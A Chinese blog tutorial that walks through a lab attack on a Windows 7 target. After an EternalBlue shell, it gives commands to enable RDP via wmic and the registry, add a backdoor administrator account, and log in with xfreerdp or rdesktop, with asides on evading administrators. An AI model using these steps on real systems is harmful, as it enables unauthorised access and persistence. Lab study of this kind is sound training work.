目录

  • 1、靶场环境
  • 2、永恒之蓝漏洞Getshell
  • 3、命令行打开3389远程连接端口
  • 4、命令行添加登录用户
  • 5、Kali自带远程连接工具进行连接
    • 5.1、xfreerdp工具
    • 5.2、xfreerdp工具
  • 小记tips

1、靶场环境

1、靶机和攻击机的信息
攻击机:kali-192.168.25.130
靶机:win7-192.168.25.132

2、永恒之蓝漏洞Getshell

msf用ms17_010先简单拿个shell
具体步骤不详细展开,只要msf选择ms17_010_eternalblue模块,设置rhost参数就行,rhost就是目标靶机的地址。

进来之后,我们就可以在攻击机上面控制win7靶机了,先查看开放的端口有没有3389.

3、命令行打开3389远程连接端口

netstat -an

没开,所以要开一下,首先要看看当前是什么权限,如果是普通用户权限可能不行,需要提权到system最高权限才行。

windows打开3389远程连接的命令有两种办法,任选其一:

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

显示successful,再次确认查看远程连接端口是否开启:

netstat -an|find "3389"

显示这样就是监听了。

补充一点
远程桌面的默认端口是3389,为了防止管理员更改了远程端口给我们连接带来意想不到的情况,需要通过查看注册表键值确认远程桌面的端口是否为3389

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

(0xd3d是16进制的3389)

4、命令行添加登录用户

windows添加用户的命令为:

net user hack 123123 /add

添加进管理员组:

net localgroup administrators hack /add

5、Kali自带远程连接工具进行连接

添加好之后,就可以用工具去连了,这里我目前知道的kali自带工具有xfreerdp,这是公司的大佬介绍给我用的,还有一个是我自己找的,叫做:rdesktop。
现在分别讲讲各自的用法吧:

5.1、xfreerdp工具

①首先是xfreerdp的,命令格式如下:
很容易理解,/u就是用户名,/p是密码,/v是靶机(目标)的地址 /size就是图形化界面的大小而已。

xfreerdp /u:hack /p:123123 /v:192.168.25.132 /size:80%


输入y

按下回车,等待界面出现

5.2、xfreerdp工具

②然后是rdesktop,命令格式很简单:

rdesktop 192.168.25.132

完整输入yes之后,远程成功,如果知道root本机密码的情况下,可以直接用这个账号去登,当然,也可以点其他用户,用刚刚新建的hack账号去登。

如果在真实渗透中,这种做法是相当危害,具体看下图。

“站,是早上打的,银手镯是中午戴的,缝纫机是晚上学会的。”——鲁迅

因为这里只是靶场演示,所以别想那么多,点击是就完事了。

然后,我们看靶机有什么反应,需要点击确定才能断开连接,但是,如果30秒不动,还是能连上去,(所以要趁管理员睡着的时候渗透是比较好的。)

连进来,为所欲为了,纯鼠标无脑操作,比命令行操作方便简单,到此结束。

小记tips

什么时候用远程比较方便呢?
比如一些CTF比赛,要你找系统里的flag,如果用命令行找,很多新手朋友可能不是很会,所以用这种远程的方法鼠标点点点,文件夹翻一翻还是很舒服的,但是呢,如果真实环境渗透,攻防比赛,用远程那是很大风险的,蓝队溯源你是分分钟的事情,而且风险太大,日志会记录行为,抓你只是时间问题,所以我们要遵守《中华人民共和国网络安全法》,做个守法的白帽子。
可能你们会问,有没有又安全,又能新建一个账户,但是呢,管理员还发现不了你的办法。答案是当然有的!只需要用命令行的方法新建一个隐藏的账户就行,但是创建起来没有这次实验那么容易,需要看注册表里的一些信息,稍微有点麻烦,具体方法下次想起来再更,干饭去了。

文章原创,欢迎转载,请注明文章出处: 渗透小技巧从getshell到3389端口远程桌面连接靶机.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

渗透小技巧从getshell到3389端口远程桌面连接靶机相关推荐

  1. 基于IPv6的Windows 3389端口远程桌面使用方法,从此告别第三方远程控制软件

    文章目录 1. 按 2. 环境 2.1. Windows 专业版(旗舰版)或企业版 2.2. 网络支持IPv6 3. 受控端配置 3.1. 打开服务 3.2. 查看IP 4. 控制端连接 4.1. 电 ...

  2. 远程桌面 计算机 加端口,远程桌面端口,小编教你如何修改远程桌面端口

    我们都知道系统自带了一个远程桌面连接,非常好用,在使用电脑过程中,用户常常会使用到这个程序,不过很多用户都忽略一个问题,就是病毒的入侵者一般先扫描主机开放端口,一旦发现其开放了3389端口,就会进行下 ...

  3. 安全设置之修改远程桌面连接默认3389端口

    目前大多数Windows系统的服务器都打开了远程桌面连接,而其默认的3389端口便成为了***者们乐此不疲的扫描对象.作为系统管理人员不得不密切注意此端口的安全风险. 一般来说,仅仅修改远程桌面默认的 ...

  4. 如何修改远程桌面连接3389端口

    众所周知,Windows远程终端服务默认端口是3389.入侵者一般先扫描主机开放端口,一旦发现其开放了3389端口,就会进行下一步的入侵,所以我们只需要修改该默认端口就可以避开大多数入侵者的耳目.但是 ...

  5. 修改Windows server远程桌面连接端口3389

    默认在Windows的操作系统上,远程桌面连接使用的端口上是3389.鉴于安全因素的考虑,很多企业会修改默认端口,防止黑客进行端口扫描. 修改远程桌面连接默认端口步骤如下: 一:需要修改注册表键值: ...

  6. 路由器端口映射,远程桌面连接--端口映射+花生壳=让人访问你个人服务器或WEB站点...

    [图]路由器端口映射,远程桌面连接--端口映射+花生壳=让人访问你个人服务器或WEB站点 2010-03-16   关键字:路由器端口映射,内网端口映射,porttunnel,端口映射,远程桌面,修改 ...

  7. 修改远程桌面连接端口

    一般Web服务器放在公网上以后,有些为了方便远程操作,所以打开了远程桌面连接.这样是很不安全的,黑客在扫描到服务器开启了3389端口以后很多都是利用这个端口发起攻击.为了降低风险而又想使用远程桌面连接 ...

  8. 网络技巧|远程桌面连接不上的多种解决方案!

    写在前面的话 专注于网络各种技巧和实用工具的分享,都是日常工作中遇到的大大小小问题记录下来分享给大家一起共同的进步和学习,或许一个个小小的教程就能让大家在遇到同样问题的时候不会那么纠结的去挣扎这么久还 ...

  9. 不能打开到主机的连接,在端口1521:连接失败的解决方法(修改远程桌面连接端口)

    1.修改远程桌面连接端口 远程桌面终端服务默认端口为"3389",为防止他人进行恶意连接,就需要对默认端口进行更改.对此可打开注册表编辑器,依次展开"HKEY_LOCAL ...

最新文章

  1. 使用VS2010调用matlab的mat格式文件
  2. Python3.9又更新了:dict内置新功能,正式版十月见面
  3. calendar类_带有时区的字符怎样转换为时间及Java 8中日期 与 Calendar 转换
  4. 《SpringBoot揭秘:快速构建微服务体系》—第3章3.5节本章小结
  5. 机器学习 深度学习 ai_人工智能,机器学习,深度学习-特征和差异
  6. [BZOJ1297/Luogu4159][SCOI2009]迷路
  7. php课程设计实验心得,PHP程序设计教程实验及课程设计
  8. (pytorch-深度学习系列)深度卷积神经网络AlexNet
  9. 华为云FusionInsight MRS:千余节点滚动升级业务无中断
  10. 入门Vue.js要学习哪些知识?
  11. 女生天生就是产品经理
  12. 团队成员的分应该怎么分?
  13. 自学python推荐书-学习python求推荐一波书籍?
  14. mongodb 分组聚合_MongoDB学习笔记整理,赶紧收藏起来吧
  15. 字符函数-(学习笔记)
  16. 中兴B860AV1.1_机顶盒_(4G和8G版)刷机固件升级和教程
  17. M-02-10.[紫猫]Sqlite3数据库插件
  18. 麻了,别再为难软件测试员了
  19. vrp java_HCIA-VRP基础及操作
  20. 打印html java 清晰度_java 利用jsp打印html页面

热门文章

  1. 基于springboot2.0的易居二手房网站-房屋管理系统
  2. mysql数据库常见问题及解决办法
  3. 基于c语言的物业管理系统设计,基于C#语言的小区物业管理系统的设计与实现
  4. Windows server 2012R2或Windows 8.1如何成功离线安装.net 4.7
  5. Rapid SCADA MQTT
  6. 张长水主任当选2018年IEEE Fellow!中国大陆17位当选者清华占了5位 !(附完整名单)
  7. windows server下的 Nginx SSL 证书安装部署
  8. 读林沛满的《Wireshark网络分析就这么简单》和《Wireshark网络分析的艺术》
  9. sql 删除重复数据 只保留一条
  10. 十分钟拥有你的私人博客!使用readthedocs和mkdocs完成你的文档托管。